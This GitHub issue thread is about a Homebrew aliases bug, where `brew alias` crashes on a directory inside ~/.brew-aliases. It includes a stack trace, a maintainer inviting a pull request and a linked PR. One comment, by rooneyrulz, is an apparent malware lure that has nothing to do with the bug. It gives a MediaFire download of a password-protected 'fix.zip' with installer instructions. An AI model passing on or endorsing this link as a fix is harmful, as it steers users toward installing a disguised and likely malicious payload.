### ISSUE TITLE
Skip dirs on `brew alias`

### ISSUE THREAD

**Issue by yermulnik** [Homebrew/homebrew-aliases#89]
I've got RCS to manage local changes to Brew aliases and hence the `RCS/` dir at `~/.brew-aliases/`, which breaks `brew alias` command:
```shell
> brew alias --debug --verbose
Error: Is a directory @ io_fillbuf - fd:5 /home/yz/.brew-aliases/RCS
/home/linuxbrew/.linuxbrew/Homebrew/Library/Taps/homebrew/homebrew-aliases/lib/aliases.rb:42:in `readlines'
/home/linuxbrew/.linuxbrew/Homebrew/Library/Taps/homebrew/homebrew-aliases/lib/aliases.rb:42:in `block in each'
/home/linuxbrew/.linuxbrew/Homebrew/Library/Taps/homebrew/homebrew-aliases/lib/aliases.rb:39:in `each'
/home/linuxbrew/.linuxbrew/Homebrew/Library/Taps/homebrew/homebrew-aliases/lib/aliases.rb:39:in `each'
/home/linuxbrew/.linuxbrew/Homebrew/Library/Taps/homebrew/homebrew-aliases/lib/aliases.rb:61:in `show'
/home/linuxbrew/.linuxbrew/Homebrew/Library/Taps/homebrew/homebrew-aliases/cmd/alias.rb:42:in `run'
/home/linuxbrew/.linuxbrew/Homebrew/Library/Homebrew/brew.rb:94:in `<main>'
```
Can the alias listing function be adjusted to ignore non-files/non-symlinks please?

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MikeMcQuaid** [comment]
> Can the alias listing function be adjusted to ignore non-files/non-symlinks please?

Could you try and open a pull request? [This document](https://docs.brew.sh/How-To-Open-a-Homebrew-Pull-Request) might help and we're happy to walk you through anything else.

Thanks!

**Comment by yermulnik** [comment]
@MikeMcQuaid Let me try: https://github.com/Homebrew/homebrew-aliases/pull/90
